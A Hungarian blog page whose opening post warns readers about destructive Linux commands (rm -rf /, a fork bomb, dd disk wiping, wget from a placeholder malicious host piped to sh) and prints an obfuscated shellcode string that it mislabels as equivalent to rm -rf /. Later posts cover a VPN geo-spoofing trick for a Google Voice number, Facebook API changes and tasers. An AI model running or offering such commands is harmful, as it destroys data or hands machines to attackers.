Ami viszont már sokkal gyilkosabb tud lenni - és nem, Sevillai Szent Izidor sem fogja megvédeni a felhasználót - az, ha linux parancsokat ad ki, amit egy fórumban olvasott, de nem tudja, hogy mit csinál. Néhánnyal az Apple fórumokon eléggé sűrűn lehet találkozni, de a trollok gyakran beírják több linuxos fórumba is. Igaz, hogy az OSX-en az operációs rendszer részeként működni képes root felhasználó létezik, de nem aktív, hasonlóan például az Ubuntuhoz, ami biztos, hogy minden unix-like rendszerben a root felhasználó létezik, elvből nem iktatható ki teljesen és a rendszer filozófiájából adódóan amilyen parancsot a parancsértelmező kap tőle, gyakorlatilag feltétel nélkül végre kell hajtania. /*gyakorlatilag persze, hogy vannak részmegoldások, amik ezektől védik a felhasználót, de összességében erre hagyatkozni igen rizikós*/ Másrészt tudvalevő, hogy a laikus felhasználó, ha valamit sürgősen meg akar oldani, akkor mindegy, hogy milyen figyelmeztetés jelenik meg, mindig arra a gombra kattint vagy azt a lehetőséget választja, amivel a leggyorsabban tovább lehet haladni.

A parancshéjakban annak a felhasználónak a nevében indulnak a parancsok, aki indította őket /*child process*/, kivéve, amikor nem: a sudo parancs lehetővé teszi, hogy a parancsvégrehajtás idejére akár a legmagasabb jogosultsági szinttel is elindulhasson egy folyamat. Természetesen linux alatt és almás  rendszernél is kifinomultan szabályozható, hogy ezzel miket lehessen megcsinálni a /etc/sudoers fájl beállításai szerint, az alapértelmezett beállítás viszont érthetően az, hogy abszolút mindent, hiszen pont erre találták ki, azaz csak akkor irkáld át hardening céljából, ha tényleg tudod, hogy mit csinálsz.

Most pedig jöjjön néhány a legveszélyesebb parancsok közül, némi magyarázattal. Alapesetben ugye mind elé csak egy sudo-t kell írni és máris root jogosultságokkal fut,

0x100.

rm -rf /

Már-már klasszikusnak számít, az rm a törlés parancsot jelenti a végén álló slash azt, hogy a rendszergyökértől kezdve mindent, a -rf pedig az a paraméter, ami megmondja, hogy mindez rekurzívan történjen (r) , azaz minden törlődjön, ami él és mozog, ráadásul olyan módon, hogy nem ad semmilyen figyelmeztetést előtte (f).

Ha úgy gondolnátok, hogy ennél szemetebb megoldás már tényleg nincs, csak úgy írom, hogy van. Ugyanis a *sh parancsértelmezőkben egyben C-nyelvű kulcsszavak, sokszor függvények is meghívhatók, ezek pedig ott vannak csőre töltve folyamatosan a memóriában. Az alábbi kódrészlet ugyanazt csinálja, mint az előbb leírt rm -rf / , viszont olyan módon, hogy ha a hülye felhasználó ezt másolja be a terminálablakba, garantáltan nem fogja érteni, hogy mit csinál, mert ún. obfuszkált kódról van szó. /*az obfuscationre nem találtam megfelelő magyar szót, lényeg, hogy egy - tipikusan egyszerű - feladat úgy van megírva, hogy azt esélytelen legyen megérteni hosszasabb elemzés nélkül*/ A kódrészlet valahogy így néz ki:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Mivel nagyon nem vagyok hardcore C-kóder, én sem jöttem volna rá azonnal, hogy pontosan mit csinál.

0x200.

:(){ :|: & };:

Maga a parancshéj is egy folyamat, így persze többszörözhető. A fent parancs arra utasítja a héjat, hogy többszörözze meg magát, úgy konkrétan végtelen alkalommal. Az eredményt nem nehéz bejósolni: a memória megtelik, a processzor pedig csúcsra jár, a gép garantáltan lefagy, értelemszerűen ha gyors gép, akkor azért, ha lassú, akkor azért.

0x300.

dd if=/dev/random of=/dev/sda

A parancs minden írható felületet véletlenszerű adatokkal fog felülírni, ráadásul olyan módon, hogy nincs az az adatvisszaállító megoldás, amivel a korábbi tartalom helyreállítható lenne. [a windows esetén a formázás, de sokszor a particionálás után is helyreállíthatók az adatok, hacsak nem lettek felülírva, természetesen wines rendszerekben, ha van Powershell, más paranccsal megcsinálható ugyanez]

0x400.

wget http://rosszindulatuoldal.tld/troll_szkriptje -O – | sh

A wget le fog tölteni egy adott webhelyről egy szkriptet, amiben bármi lehet és ezt azonnal át is adja a parancsértelmezőnek, ami persze nem csak sh lehet, hanem másmilyen is. A pompás az egészben, hogy ez az egész szintén a legmagasabb jogosultságokkal fog lefutni, aztán jó esetben nem füstöl el a gépben lévő processzor, hiszen ún. alacsony-szintű hívásokkal lazán írható olyan szript, ami a processzor órajel-többszörözését [GHz] átállítja olyan értékre, amire nagyon nem szabadna. Az alacsony-szintű hívásokhoz nem nagyon értek, de lényeg, hogy olyat is csinálhat egy szkript, ami után azon a gépen már nem sok telepítő fog futkosni és garanciavesztéssel is jár.

Tanulság: ne hajtsatok végre olyan műveletet, pláne ne adjatok ki olyan parancsot a gépen, amiről nem tudjátok pontosan, hogy mit csinál. Akkor sem, ha valaki a szeplőtelen szűzanyára esküszik, hogy az a megoldás vagy egy fórumban találjátok.

Mielőtt valaki úgy gondolná, hogy a méregdrága nagyszámítógépes rendszerek az ilyenektől nyilván mind védve vannak, ezzel kapcsolatban nyilván nem mondhatok sokat, de amit biztosan, hogy ne legyenek illúzióink.

Megjegyzés az első gyilkos szkripttel kapcsolatban: C-forráskódban ne lepődjünk meg semmin, a lenti forráskód lefordítva egy karácsonyi gyerekverset ír ki, az obfuscation klasszikusának mondható, de van még pár ilyen. Eléggé beteg dolog, de több olyan verseny is van, aminek az a célja, hogy a vicces kedvű fanatikusok minél áttekinthetetlenebb kódot írjanak, általában C-ben, de a Perl-es sem piti általában, annyira, hogy egyiket-másikat én sem értem meg gyorsan.

#include <stdio.h>
main(t,_,a)char *a;{return!0<t?t<3?main(-79,-13,a+main(-87,1-_,
main(-86,0,a+1)+a)):1,t<_?main(t+1,_,a):3,main(-94,-27+t,a)&&t==2?_<13?
main(2,_+1,"%s %d %dn"):9:16:t<0?t<-72?main(_,t,
"@n'+,#'/*{}w+/w#cdnr/+,{}r/*de}+,/*{*+,/w{%+,/w#q#n+,/#{l+,/n{n+,/+#
n+,/#;#q#n+,/+k#;*+,/'r :'d*'3,}{w+K w'K:'+}e#';dq#'l
q#'+d'K#!/+k#;q#'r}eKK#}w'r}eKK{nl]'/#;#q#n'){)#}w'){){nl]'/+#n';d}rw
' i;# ){nl]!/n{n#'; r{#w'r nc{nl]'/#{l,+'K {rw' iK{;[{nl]'/w#q#n'wk
nw' iwk{KK{nl]!/w{%'l##w#' i; :{nl]'/*{q#'ld;r'}{nlwb!/*de}'c
;;{nl'-{}rw]'/+,}##'*}#nc,',#nw]'/+kd'+e}+;#'rdq#w! nr'/ ') }+}{rl#'{
n' ')# }'+}##(!!/")
:t<-50?_==*a?putchar(31[a]):main(-65,_,a+1):main((*a=='/')+t,_,a+1)
  :0<t?main(2,2,"%s"):*a=='/'||main(0,main(-61,*a,
"!ek;dc i@bK'(q)-[w]*%n+r3#l,{}:nuwloca-O;m .vpbks,fxntdCeghiry"),
a+1);}

Persze sokféleképp gallyra lehet még vágni egy rendszert, a pontosság kedvéért a fenti parancsokat a http://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/ cikk alapján ellenőriztem, egyébként admin berkekben nem számítanak újdonságnak.
Képek forrása: bitsocialmedia.com, butac.it, hitdojo.com

0 Tovább

Vasárnap Bolyai-díj átadás


Vagy ott leszek vagy sem, de tippelni addig lehet!

0 Tovább

A depresszió módosítja a DNS-t?


Úgy fest, hogy nem kamu: egereken végzett kísérletek alapján azt állapított meg, hogy a sejtekben lévő ún. mitokondriális DNS-re korábban nem ismert módon hatással van a környezet, ami a teljes szervezetet éri. A mitokondrium az a sejtszervecske, ami többek közt a a sejtek energiatermeléséért felelős és saját, sejtmagi DNS-től független DNS-lánccal rendelkezik. A mitokondriális DNS elváltozását depressziós betegekben vették észre egy 11 ezer főből álló mintán, ezzel csengett egybe az egereken végzett kísérlet, ha minden igaz.

Az IFLscience cikke szerint az egész szervezetet érintő stresszhatás alatt mitokondriális DNS-ből több jön létre, míg a (sejtmagi) DNS ún. telomer régiója intenzívebben rövidül, ami azért elgondolkodtató, mert ennek a régiónak kulcs szerepe van abban, hogy egy sejt mennyi alkalommal osztódhat illetve stabilizálja a kromoszómavégeket.

Amit fontos megjegyezni, hogy a IFLscience április végi cikke az Oxfordi Egyetem Wellcome Trust Centre for Human Genetics kutatóira hivatkozik, a cikk viszont hivatalosan a Current Biologyban csak május 4-én jelent meg Molecular Signatures of Major Depression címmel, teljes terjedelmében itt olvasható.

Maga a cikk még nekem is eléggé kackiás, könnyen lehet, hogy az ok-okozati összefüggés nem úgy néz ki, ahogyan azt a kutatók láttatni szeretnék, amiben biztos vagyok, hogy különböző környezeti viszonyok közt nagyon sok változás történik a sejtek szintjén, amik közül megtévesztő néhányat kiemelni.

Eleve a mitokondrium genomja egy igencsak különös állatfaj, emlékeim szerint emberben mindössze 30-40 gént kódol, leginkább a baktériumok genomjához hasonló és sokkal nagyobb sansszal éri sérülés, mint a sejtmagi genomot olyan módon, hogy a keletkezett hibát semmilyen mechanizmus nem javítja ki. Ezen kívül a genetikai kódja eltér a természetben megszokott genetikai kódtól. Itt megjegyzem, hogy a genetikai kód fogalmát a mainstream sajtó nagyon gyakran keveri a DNS-szekvencia fogalmával, de még a géntérkép fogalmával is.

Mindenesetre a mitokondriális DNS és a környezet egymásra hatása azért is érdemel figyelmet, mert annak ellenére, hogy igen kevés gént kódol, több betegséggel kapcsolatban is igazolódott korábban, hogy az a mitokondriális DNS mutációjára vezethető vissza.

Ami a kutatásban megfigyelt elváltozásokat illeti, alighanem inkább a változó környezetben megjelenő más fehérjék, ilyen módon a teljes sejt stabilitását szavatoló stresszfehérjék felé lenne érdemes tapogatózni.

A DNS repair folyamatát általánosságban valahogy így kell elképzelni:

kép innen: http://www.dddmag.com/news/2014/06/researchers-discover-enzymes-role-dna-repair

0 Tovább

SMS és Google Hangouts értesítés Facebook-eseményekről


SMS-értesítések facebookos történésekről? Gyakorlatilag bármilyen aktivitásról? Vagy akár a Google-szolgáltatások használata közben is jelenjen meg egy kis buborék, ami értesít, ha valami történik a Facebookodon? Nem tűnik túl értelmes dolognak, bizonyos esetekben hasznos lehet. Például, ha munkahelyen a FB tiltva van, de a Google-szolgáltatások nem.

Először is leszögezném, hogy én Google-szolgáltatásokat saját célra elvből csak annyira használok, amennyire nagyon kell, másrészt szintén elvből számomra a Facebook csak az asztali gépen létezik, egészen kivételes esetben lépek fel rá a mobilom böngészőjén keresztül, ha valahol esetleg várakoznom kell, egyébként például a Messengert sem telepítettem, tőlem aztán történhet bármi, nem hagyom, hogy a "Kéktakony" nyomkodjon engem. Ez természetesen nem jelenti azt, hogy ne kellene ismernem behatóan ezeket a szolgáltatásokat, viszont ennek az elterjedtségükön - ilyen módon megkerülhetetlenségükön - kívül semmi más oka nincs, akár hagyományos használatról, akár kutatásról vagy fejlesztgetésről van szó.

Távol álljak tőle, hogy most azokat a felhasználókat kezdjem el ekézni, akik akár még társaságban is képesek ezerrel nyomkodni a Facebookot, véleményem persze van, de ez a poszt nem erről szól. Másrészt az a felvetés, hogy SMS-ben értesüljünk mindenről, már csak azért is bizarrnak tűnik első látásra, mert az okosmobilok úgyis tudnak push-üzeneteket fogadni, az erre épülő instant üzenetküldők pedig lassan kiszorítják a jó öreg SMS-t. Mégsem mindegy, hogy valaminek az SMS értesítései elérhetőek-e ingyenesen.

Végülis már ezer éves, nem valamilyen kiegészítőhöz, hanem a Facebook core részéhez tartozó feature, hogy amilyen szolgáltatókkal megállapodást kötött a Facebook, azoknak a szolgáltatóknak az ügyfelei akár egy ezer éves mobilon is SMS-ben értesülhetnek testreszabottan olyan FB-aktivitásokról, amik fontosak lehetnek számukra, de akár mindről is. így például ha valaki egy osztrák A1-es SIM-kártyával használja a mobilját, gyakorlatilag bárhol értesülhet egy új üzenetről SMS-ben vagy egy fontos ismerős új posztjáról anélkül, hogy az adatforgalmat jelentene számára. Bizonyos országokban több ilyen szolgáltató is van, míg például Magyarországon máig egy sem.

Ha például a munkahelyen a Facebook tiltva van, ésszerű összedrótozni valamivel, amivel mégiscsak használható több-kevesebb funkcionalitással, viszont ahogy erről korábban írtam, a dolog veszélyes üzem, hacsak nem egy jól ismert szolgáltatásról van szó, mint például a Skype, amivel korlátozottan, de lehet Facebookozni, ha össze vannak drótozva a fiókok. Az is előfordulhat, hogy nincs tiltva, de valami miatt nem szeretnél új ablakot nyitni vagy célzottan csak bizonyos történésekről értesülni, arról viszont azonnal, viszont nincs nálad olyan külföldi SIM-kártya, aminek a szolgáltatójával a fent leírt módon megállapodott volna a Facebook. A mindig elérhető alternatíva az, hogy a Facebook egyszerűen küldjön ezekről email kivonatot, ami viszont pörgősebb és sokkal dinamikusabb, az az SMS-ben/Gootle Voiceban/Hangoutban rejlő lehetőség.

Itt meg kell jegyeznem, hogy amit leírok, annak az alkalmazása formálisan nem teljesen legális, mivel például a Google a voIP-hívószámot eleve csak az USA állampolgárainak biztosítja. Tehát a funkció eléréséhez vagy kint kell lenni az USA-ban vagy el kell hitetni a Google-lel, hogy ott vagy, azt pedig többek közt az IP-címhez tartozó földrajzi hely alapján dönti el.

Ha el kell hitetni valamilyen szolgáltatással, hogy adott országban vagy, virtuális magánhálózat [VPN] használata kézenfekvő, a VPN szolgáltatók közt pedig a fizetősök mellett vannak ingyenesek is, mint például amit a VPNbook ajánl, de az ingyenesek használata tartósan nem ajánlott, nem csak azért, mert rémesen lassúak. Nem büntetnék senkit azzal, hogy különböző operációs rendszerekben egy-egy VPN-hálózatra hogyan kell csatlakozni, lényeg, hogy a beállítás fél percnél általában nem tart hosszabb ideig. A teljes folyamathoz pedig természetesen használjunk szűz böngészőt vagy használjuk a "pornó módot", azaz privát böngészést, lényeg, hogy a megtévesztendő szolgáltatás az általa korábban elhelyezett webhelyadatokhoz, sütikhez ne férjen hozzá.

Miután csatlakoztunk egy USA-beli VPN-re, első lépésben a Google-fiókba való bejelentkezés után ugorjunk el a http://google.com/voice oldalra. Ezen a fülön teljesen más jelenik meg az USA-ban és az USA-n kívüli területeken. A beállítás után viszont a saját fiókodban már Európából is elérhető lesz az, amit beállítottál. Ekkor jön az USA-beli telefonszám létrehozása [nem saját mobilszám használata!], amivel kapcsolatban nem nagyon van megkötés, viszont pofás dolognak tűnik a saját magyar mobilszámodat beírni a keresőbe, ekkor a Google keres egy olyan számmezőt, ahol az adott szám még szabad és ha talált, felajánlja regisztrációra, teljesen ingyenesen. Azaz ha mondjuk a magyar mobilszámod 70 1124545, akkor kihasználva azt, hogy az USA egy körzetén belül a telefonszámok szintén hét számjegyűek, érdemes a 1124545-ra rákeresni, így a Google-számod mondjuk +1 555 1124545 lesz, ami az ismerősök számára ismerősebb, könnyebben megjegyezhető.

A telszám létrehozása tehát értelemszerű, a Google-fiókodhoz fog tartozni:

Ezt követően gyakorlatilag azonnal lehet SMS-eket fogadni, a hívások fogadásához érdemes telepíteni a Google Voice böngésző plugint, de ezt a Google úgyis felajánlja. Ha zavaros lenne, hogy melyik a Google Voice, Google Talk, Google Hangout, mindenkit megnyugtathatok, hogy ennek végfelhasználói szempontból most semmi jelentősége.

Miután a telefonszám létrejött, finomhangolható az ún. portolással, hogy az SMS-ek az adott felületen kívül melyik email-címre érkezzenek, a hanghívások át legyenek-e irányítva, ezen kívül finomhangolható a hangposta, de alapvetően csak az olyan szolgáltatásokért kell fizetni, amik átirányítással járnak, mivel az egyszerűsítve olyan, mintha az előfizető hívást indítana illetve fizetős az SMS-küldés az USA-ban a legtöbb hálózat felé, ezen kívül az ún. végződtetési szolgáltató is számít, ami ebben az esetben ingyenes lesz. A beállítás végén a böngészőben valami ilyesmi látható:

Amint ez megvan, a Facebookba való bejelentkezés után a fiókhoz adjuk hozzá a frissen sült számot, a Mobile menüpont alatt, országként az USA-t, szolgáltatóként a Google Voice-t választva

Ezt követően egy megerősítésre van szükség a Facebook által SMS-ben kiküldött azonosító megadásával.

Miután ez megvolt, a Facebook-fiók a virtuális mobilszámmal össze is lett kapcsolva. Fontos megkülönböztetni azt, amikor a Facebook egyszerűen csak tudja a mobilszámunkat és arra különösen indokolt esetekben tud értesítést küldeni, kétlépcsős azonosításhoz használod vagy éppenséggel arról van szó, hogy a FB úgy van beállítva, hogy maguk a standard értesítések is menjenek SMS-ben [mobilhálózatok közt ebben mutatkozik meg a különbség, ahogy fentebb írtam].

Ha minden jól ment, a dolog valahogy így fog kinézni a Mobile mezőben:

Azt pedig, hogy milyen esetekben zargasson SMS-ben a Facebook, már a Notifications-nél kell beállítani:

Az, hogy miről és milyen gyakorisággal érkezzen értesítő, ahhoz idomul, amiről egyébként is értesítene a Facebook, azaz ha például úgy van beállítva, hogy azoknak az ismerőseidnek a posztjairól értesítést kérsz, akik ott vannak a Close friends listában, szinte az összes aktivitásuk SMS-ben záporozik majd be. Amit megjegyzek, hogy a Facebooknak van annyi esze, hogy hiába van beállítva például az email kivonatok küldése bármivel kapcsolatban, ha be vagy jelentkezve, bizonyos eseményekről értelemszerűen nem jön kivonat. Azaz például nekem az összes üzenetem megérkezik emailen is, de ha pont be vagyok lépve, amikor valaki üzenetet küld és azt el is olvasom, arról már nem fog értesítő jönni. Az SMS-ekkel teljesen hasonló a helyzet, ezt a teszteléskor figyelembe kell venni! Ami az értesítések testreszabását illeti, érthetően erre nincs általános recept.

Készen is van! A gépet le is lehet választani a VPN-ről minden más már menni fog hagyományos netkapcsolaton keresztül. A Google-ben megjelenő FB-értesítések egyrészt megjelennek nyilván, ha a Gmail/Hangouts/ szolgáltatást éppen használod a böngészőben, akkor is, ha éppen nem használod, viszont nem jelentkeztél ki és az értesítések a böngészőprogram számára engedélyezettek [ekkor buborékok formájában], ezen kívül természetesen mobilra és asztali gépre is telepíthető a Google csevegője.

Az értesítések potyognak is be a postafiókba és ha például valaki üzenetet küldött, emlékeim szerint tudsz is neki válaszolni onnan, mivel az üzenetek azonosítója egy-egy nyolc számjegyű, USA-beli rövid hívószám, így az USA-beli számodról válaszolva a Facebook e kettő alapján tudni fogja, hogy az üzenetet kinek kell továbbítani, emlékeim szerint ez is ingyenes, valahogy így kell elképzelni webes felületen:

Amit megjegyeznék, hogy a leírt lehetőségeket kipróbáltam azért, hogy legyenek ábrák ehhez a poszthoz, viszont nem használom sem a Gmail-címem, sem a Google-számom, sem a Google Hangouts-ot és magát a Facebook SMS-értesítőt sem. Előfordulhat, hogy valami nem pontosan ugyanúgy működik a beállítás folyamatában másnál is, a beállítás nem egy rocket science, nem mentem bele minden részletbe.

Amit viszont nagyon fontos tudnod, mielőtt belecsapsz: sem a Facebook, sem pedig a Google nem hülye olyan értelemben, hogy ha azt tapasztalja, hogy 12:30-kor még Hejőszalontáról használtad a szolgáltatást, 12:35-kor pedig kapásból helyes felhasználói név és jelszó megadásával bejelentkezel VPN-en mondjuk Washington D.C-ből, és korábban ilyet még nem csináltál, akkor a Google és a Facebook szintén annak megfelelően fog eljárni, mintha a jelszavad esetleg ellopták volna. Érthető, hiszen életszerűtlen 5 perc alatt a világ másik végéről belépni. Ezért mindkettő rákérdezhet olyan adatokra, mint a másodlagos email-címed, a születési időd és hasonló olyan adatok, amikről feltételezi, hogy csak Te tudhatsz, ezeket mindkét szolgáltatásban előzetesen ellenőrizd. Ami igencsak komfortos, ha mindkét helyen korábban már adtál meg megerősített, azaz igazolt, mondjuk magyar mobilszámot, mivel egy kérdéses belépésnél egy arra érkező megerősítő SMS-ben lévő azonosítóval azonnal tudod igazolni magad a szolgáltatás előtt. Hozzáteszem, ha azt látja, hogy össze-vissza ugrálsz a vakvilágba VPN-en, webes proxyn, TOR-on keresztül vagy bármi olyan megoldással, ami ellehetetleníti, hogy a szolgáltatás azonosítsa a tényleges földrajzi pozíciód, néhány belépés után már egyáltalán nem picsog, úgy is mondhatnánk, hogy megtanulta.

Itt már egyszer megkaptam, ezért inkább írom, mielőtt valaki bekommentelné, hogy "itt a tavasz, inkább menjetek a friss levegőre, miért kell ennyit foglalkozni a FB-kal", egyrészt ahogy az a posztból is kiderül, itt egy elvi lehetőséget vázoltam fel, másrészt ahogy a korábbi posztokból is kiolvasható, a webes óriások azért nem kerülhetők meg a mindennapjainkban, mert olyan jók lennének, hanem azért, mert olyan információforrásként működnek, legyen szó akár a személyes kapcsolatokkal összefüggésben lévő információkról, akár szakmai információkról, amiket máshonnan ésszerű idő alatt nem lehet összekukázni. Viszont feltételezem, hogy a felhasználó nem közösségi web-heroinista középsúlyos Facebook-addikt, az elvi lehetőség adott, az már a felhasználó dolga, hogy normálisan, ésszerűen használja.

Tessenek szépen lenyugodni, hamarosan írok a Medium.com-ról, a Quibb-ről, Prismaticról és hasonló szolgáltatásokról is.

0 Tovább

FB: Vége az automatizált ismerőskukkolásnak


A Facebook még a 2014-es F8 fejlesztői csúcson jelentett be több, Facebook-kisalkalmazást gyökeresen érintő változtatást

A módosítások április 30-ától hatályosak és azoknál az appleteknél lehetnek különösen feltűnőek, amik a felhasználó ismerőseinek körét használják egyik adatforrásként, egyébként pedig szinte mindnél.

Amikor egy Facebook appletet indít valaki, a FB illedelmesen rákérdez, hogy a szükséges engedélyeket megadja-e a felhasználó az alkalmazás számára, így például a születésnapot, az életkort, a profilkép lehívását, azt, hogy a felhasználó nevében posztolhat-e a falára, lényegében bármit, olyan információt is, ami egyébként minden ismerős elől rejtve van. A egység sugarú júzer pedig szokás szerint ekkor zsigerből kattint az engedélyezés gombra, az applet pedig lekérdezi a szükséges adatokat. Mindezt az alkalmazás az ún. Facebook API-n [application programming interface] keresztül teszi, aminek megvannak a maga játékszabályai, amik értelemszerűen időnként frissítésre szorulnak.

Alapvetően szinte az összes korábbi alkalmazásnak újra engedélyt kell kérnie a további működéshez az API 2.0-ás verziójának életbe lépése miatt, bizonyos alkalmazások egyáltalán nem lesznek működőképesek: eddig a függvénykönyvtár egy igencsak népszerű részét képezték azok a függvények, amik le tudták kérdezni a felhasználó ismerőseinek körét, sokszor az ismerősök ismerőseit, az ismerősökkel kapcsolatos cimkéket, hogy majd azzal kezdjenek valamit. Például az alkalmazás kiolvasta az ismerőseid, annak az ismerősi körét is a nevedben, majd mindebből rajzolt egy pofás kis gráfot, amiben vagy egyszerűen csak lehetett gyönyörködni, megint mások használhatták adathalászatra, a kutatók pedig természetesen a közösségek legkülönfélébb szempontú vizsgálatára.

Ez utóbbi műfajban az egyik kedvenc tudományos cikkem azzal foglalkozik, hogy egy jól irányzott kisalkalmazással még akkor is lekérdezhető, hogy az adott felhasználó kivel kavar, ha nincs is fenn az ismerősei közt az illető. Már volt róla szó, magyar nyelven ezzel a Precognox blogja foglalkozott A Facebook tudja kivel kavarsz - akkor is ha nem jelölöd a profilodon címmel. Amit azért fontos hozzátennem, ami úgy minden facebookos információra igaz, hogy itt sem maga a Facebook jelent kockázatot a felhasználó magánszférájára nézve, hanem az, ha a felhasználó mindenféle barom kisalkalmazásnak megad mindenféle engedélyt, aztán meg alaposan megfeledkezik róla. Ha történetesen adathalász alkalmazásról van szó, az alkalmazás készítője gyakorlatilag mindent láthatott a felhasználóról, az ismerősi körön keresztül például abból is adatbázist építhetetett a fejlesztő, hogy valaki mikor, kivel, hova checkolt be, teljesen észrevétlenül, egészen eddig akár évekig.

Az appok közül egyébként itt lehet kegyetlenül legyilkolni azonnal azt, amiről nem tudod azonnal, hogy micsoda, míg az Apps Others Use alatt azt szabályozhatod, hogy milyen adatokat tudjanak az appletek rólad lekérdezni. A Facebook Platform teljes kikapcsolása nem ajánlott.

Nem mennék bele abba a kérdésbe, hogy az előbb vázolt kockázat végülis a Facebook, a felhasználó vagy a rosszindulatú kisalkalmazások bűne, a mi szempontunkból a lényeg, hogy az API legújabb változatában az ilyen típusú kukkolásra csak sokkal körülményesebben van lehetőség, mivel kiherélték az ismerősök és velük kapcsolatos adatok lekérdezésével kapcsolatos függvénykönyvtár használhatóságát.

A F8 hivatalos bejelentésének leglényegesebb mondandóját ennél rövidebben aligha lehetne összefoglalni:

Any deprecated permissions will be removed from existing users, and won't be grantable by new users. This includes the friends_* permissions, xmpp_login or user_checkins.

A dokumentációban pedig az indoklás valahogy így néz ki:

To put people first. This update was in response to feedback from people who were uncomfortable knowing that a friend could share their information with an app. With Graph API v2.0, we wanted to make sure that people had more control over their information.

Na már most normális emberben felmerül a kérdés, hogy akkor eddig mégis miért nem eleve így volt? IMHO azért, mert a FB attól tartott, hogy a felhasználói élmény csökkent volna, ami miatt ugye eleve az egész Facebook lett volna valamivel kevésbé népszerű. A "To put people first" igaz, csak éppen nem abban az értelemben, ahogy a Facebook láttatni akarja: a felhasználók biztonsága nem érdekli őket jobban, mint korábban, egészen addig, amíg nem érkeznek olyan visszajelzések tömegesen, amiből arra következtetnek, hogy a felhasználók kevésbé érzik magukat biztonságban, ami nyilván nem azt jelentené, hogy a felhasználó ésszel él, aztán korlátozza a róla lekérdezhető adatokat illetve lelövi az általa futtatott, de ismeretlen, tisztázatlan működésű kisalkalmazásokat, hanem inkább kevésbé használja a FB-t. Emlékeztető: a felhasználók egy részének még így is túl bonyolult a felület!

Elsőre nem nagyon bonyolult dolgokra gondoljunk az ismerőskukkolda kapcsán! Láttam egy tucat olyan alkalmazást, ami persze pénzért figyeli, hogy ki törölt az ismerőseid közül, mindezt nyilván úgy, hogy periodikusan lekérdezi az ismerősök halmazát és összeveti a korábbival. Persze annak, hogy egy ismerős eltűnik, lehet oka az is, hogy az illető deaktiválja a profilját, törli magát a Facebookról vagy letiltja emberünket, azon a lényegi dolgon nem változtat, ami szerint a Facebook a hivatalos súgóban szavatolja, hogy nem jelzi, ha egy ismerős töröl a kontaktjai közül. Erre nyitott kiskaput néhány fizetős mobilapp a kezdetektől azok számára az egoista türhők számára, akik képesek voltak ezért még pénzt is kiadni, azzal kapcsolatban pedig most inkább nem mondanék véleményt, ha valakinek annyira gesztus értékű az, ha más törli ismerősei közül, hogy szükségesnek látja ezt kisalkalmazással figyeltetni, valamit az életben nagyon rosszul csinál...

Végülis amellett, hogy a Facebook - pontosabban ahogy tisztáztam, az API-ja – biztonságosabbá is vált, sajnos sok-sok kutató alaposan szívhatja a fogát, aki például szociometriai kutatásaihoz a Facebookot használta adatforrásként. Az ismeretségi kör továbbra is lekérdezhető bizonyos esetekben, így például, ha a másik, adatforrásként használt ismerős szintén használja ugyanazt az alkalmazást az összes szükséges permissionnel, de nyilván teljesen életszerűtlen, hogy egy alkalmazást az összes ismerősünk használjon, körülbelül annyira, mintha azt mondanád valakinek, hogy "lécci tedd már fel ezt az appletet, mert szeretném tudni, hogy mikor tiltasz le".

Ma amolyan fészezős napot tartok, hamarosan jön még egy poszt arról, hogy hogyan értesülhetsz általad meghatározott szabályok alapján SMS-ben vagy Google Talk üzenetben egy-egy facebookos történésről, a friss posztjaim követéséhez itt tessék csengetni a Követés gombra kattintással: https://www.facebook.com/bardoczi

kép forrása: http://qz.com/140357/what-your-facebook-friends-list-reveals-about-your-love-life/

0 Tovább

A sokkoló nem halálos - ahogyan a shotgun sem az...


Mármint akkor nem, ha azzal a shotgunnal nem fejbe vagy mellkason lőnek, esetleg a lövedék nem üti át a lábat ellátó arteria femoralist, amitől az áldozat kábé azonnal elvérzik, de tippeket nem adnék a blogomat olvasó shotgun-tulajdonosoknak :)

Szóval néhány napja azon pörög a magyar sajtó, hogy az Országgyűlés Hivatala tasereket vásárolt aranyáron a házelnök védelme érdekében, mire hozzá is tették gyorsan, hogy a sokkoló amúgy nem halálos eszköz.

Fegyvert fegyverrel összehasonlítani aligha lehet, ezt a cirkuszt meg nem is nagyon értem, veszélyes lenne viszont azt hinni, hogy a sokkoló biztosan veszélytelenebb a lőfegyvernél. Jó esetben úgyis csak olyannak engedik meg, hogy taserrel mászkáljon, akinek egyébként is engedélye van éles lőfegyver használatára, gyakorlatilag meg ki tudja. írom, hogy miért: a taser által leadottnál sokkal kisebb elektromos ütés is halált okoz, ha olyat ér, akinek bizonyos típusú szívritmuszavara van - és a lényeg - ha az illető pacemakert használ és úgy lövik meg taserrel, nincs az a csodatraumatológus, aki megmentse az érintettet a biztos haláltól, ugyanis a legdrágább szívritmus-szabályozók is biztosan azonnal gallyra vágódnak ekkora elektromos lökéstől, gyakorlatilag függetlenül attól, hogy a test melyik részét érinti az elektromos behatás:

Effect of Stun Gun Discharges on Pacemaker Function (Azamuddin Khaja; Gurushankar Govindarajan; Wayne McDaniel; Greg Flaker)

Mondjuk engem egyszer sem lőttek meg sokkolóval, meg nem is földeltem le soha két kézzel zárlatos főelosztót szerverszobában, műértőknek mutatok két képet, amiből látszik, hogy a szívritmus nem játék, attól is rendesen megborulhat, ha rommá dolgozod magad:

Ha nekem választani kellene, hogy lőfegyverrel vagy taserrel lőjenek, inkább csak egy vodkanarancsot kérnék előtte sok narancslével és még több bétablokkolóval, akkor talán esélyesebb a túlélés.

Egy szó, mint száz, valahogy megint a lényeg kerülte el a köz figyelmét, abban meg csak bízhatunk, hogy ha már ez a helyzet, tasert csak olyan kap, aki lőfegyvert is kaphatna.

Pacemakerem ugyan nincs, de ha esetleg lesz, csak reménykedem benne, hogy nem lesz benne WiFi.

0 Tovább

A Citizenfour-hype - ennél trágyább dokumentumfilm idén sem lesz


Tegnap az Origón jelent meg egy újabb kritika az NSA-botrányt feldolgozó Citizenfour-ral kapcsolatban, amiben Mesterházy Lilitől olvashatjuk, hogy "A Citizenfour felbecsülhetetlen értékű kordokumentum, tele hátborzongató, szomorú jelenetekkel."

